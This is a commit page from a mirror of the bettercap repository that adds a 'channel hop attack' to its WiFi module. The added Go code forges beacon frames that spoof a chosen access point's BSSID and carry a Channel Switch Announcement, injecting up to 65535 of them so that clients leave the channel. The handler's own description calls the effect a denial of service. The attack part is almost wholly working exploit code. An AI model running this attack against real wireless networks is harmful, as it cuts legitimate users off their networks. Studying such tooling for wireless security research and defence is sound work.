github/bettercap
1
0
Fork 0
mirror of https://github.com/bettercap/bettercap synced 2025-08-22 06:23:18 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

add channel hop attack

Browse source
This commit is contained in:
ydx 2020-06-03 04:32:22 +08:00
commit ade832f004
3 changed files with 130 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

28
modules/wifi/wifi.go
View file

@ -52,6 +52,7 @@ type WiFiModule struct {
assocSkip []net.HardwareAddr assocSkip []net.HardwareAddr
assocSilent bool assocSilent bool
assocOpen bool assocOpen bool
csaSilent bool
filterProbeSTA *regexp.Regexp filterProbeSTA *regexp.Regexp
filterProbeAP *regexp.Regexp filterProbeAP *regexp.Regexp
apRunning bool apRunning bool
@ -83,6 +84,7 @@ func NewWiFiModule(s *session.Session) *WiFiModule {
assocSkip: []net.HardwareAddr{}, assocSkip: []net.HardwareAddr{},
assocSilent: false, assocSilent: false,
assocOpen: false, assocOpen: false,
csaSilent: false,
showManuf: false, showManuf: false,
shakesAggregate: true, shakesAggregate: true,
writes: &sync.WaitGroup{}, writes: &sync.WaitGroup{},
@ -196,6 +198,32 @@ func NewWiFiModule(s *session.Session) *WiFiModule {
mod.AddHandler(deauth) mod.AddHandler(deauth)
switch_channel_announce := session.NewModuleHandler("wifi.channel_switch_announce bssid channel packet_count", `wifi\.channel_switch_announce ((?:[a-fA-F0-9:]{11,}))\s+((?:[0-9]+))\s+((?:[0-9]+))`,
"Start a 802.11 channel hop attack, every client will be force to change the channel lead to dos.",
func(args []string) error {
bssid, err := net.ParseMAC(args[0])
if err != nil {
return err
}
channel,_:=strconv.Atoi( args[1])
if channel>180 || channel<1{
return fmt.Errorf("%s is not a valid channel number")
}
packet_count,_:=strconv.Atoi( args[2])
if packet_count>65535{
packet_count=65535
}
return mod.startCSA(bssid,int8(channel),packet_count)
})
switch_channel_announce.Complete("wifi.channel_switch_announce", s.WiFiCompleterFull)
mod.AddHandler(switch_channel_announce)
mod.AddParam(session.NewBoolParameter("wifi.channel_switch_announce.silent",
"false",
"If true, messages from wifi.channel_switch_announce will be suppressed."))
mod.AddParam(session.NewStringParameter("wifi.deauth.skip", mod.AddParam(session.NewStringParameter("wifi.deauth.skip",
"", "",
"", "",

78
modules/wifi/wifi_channel_switch_announce.go Normal file
View file

@ -0,0 +1,78 @@
package wifi
import (
"bytes"
"fmt"
"github.com/bettercap/bettercap/network"
"github.com/bettercap/bettercap/packets"
"net"
)
func (mod *WiFiModule) isCSASilent() bool {
if err, is := mod.BoolParam("wifi.channel_switch_announce.silent"); err != nil {
mod.Warning("%v", err)
} else {
mod.csaSilent = is
}
return mod.csaSilent
}
func (mod *WiFiModule) sendBeaconWithCSA_Packet(ap *network.AccessPoint, to_chan int8, packet_count int) {
ssid := ap.ESSID()
if ssid == "<hidden>" {
ssid = ""
}
hw, _ := net.ParseMAC(ap.BSSID())
for seq := 0; seq < packet_count && mod.Running(); seq++ {
if err, pkt := packets.NewDot11BeaconWithCSA(uint16(seq),to_chan,ssid,hw); err != nil {
mod.Error("could not create beacon packet: %s", err)
continue
} else {
mod.injectPacket(pkt)
}
}
}
func (mod *WiFiModule) startCSA(to net.HardwareAddr, to_chan int8, packet_count int) error {
// if not already running, temporarily enable the pcap handle
// for packet injection
if !mod.Running() {
if err := mod.Configure(); err != nil {
return err
}
defer mod.handle.Close()
}
var ap *network.AccessPoint = nil
for _, _ap := range mod.Session.WiFi.List() {
if bytes.Equal(_ap.HW, to) {
ap = _ap
}
}
if ap == nil {
return fmt.Errorf("%s is an unknown BSSID", to.String())
}
mod.writes.Add(1)
go func() {
defer mod.writes.Done()
if mod.Running() {
logger := mod.Info
if mod.isCSASilent() {
logger = mod.Debug
}
logger("channel hop attack in AP %s (channel:%d encryption:%s), hop to channel %d ", ap.ESSID(), ap.Channel, ap.Encryption, to_chan)
// send the beacon frame with channel switch announce element id
mod.onChannel(ap.Channel, func() {
mod.sendBeaconWithCSA_Packet(ap, to_chan, packet_count)
})
}
}()
return nil
}

24
packets/dot11.go
View file

@ -89,6 +89,30 @@ func NewDot11Beacon(conf Dot11ApConfig, seq uint16) (error, []byte) {
return Serialize(stack...) return Serialize(stack...)
} }
func NewDot11BeaconWithCSA(seq uint16, channel int8, ssid string, bssid net.HardwareAddr) (error, []byte) {
return Serialize(
&layers.RadioTap{},
&layers.Dot11{
Address1: network.BroadcastHw,
Address2: bssid,
Address3: bssid,
SequenceNumber: seq,
FragmentNumber: 0,
Type: layers.Dot11TypeMgmtBeacon,
},
&layers.Dot11MgmtBeacon{
Timestamp: 0,
Interval: 0x64,
Flags: 65535,
},
Dot11Info(layers.Dot11InformationElementIDSSID, []byte(ssid)),
Dot11Info(layers.Dot11InformationElementIDRates, fakeApRates),
Dot11Info(layers.Dot11InformationElementIDSwitchChannelAnnounce, []byte{0,byte(channel),0}),
)
}
func NewDot11Deauth(a1 net.HardwareAddr, a2 net.HardwareAddr, a3 net.HardwareAddr, seq uint16) (error, []byte) { func NewDot11Deauth(a1 net.HardwareAddr, a2 net.HardwareAddr, a3 net.HardwareAddr, seq uint16) (error, []byte) {
return Serialize( return Serialize(
&layers.RadioTap{}, &layers.RadioTap{},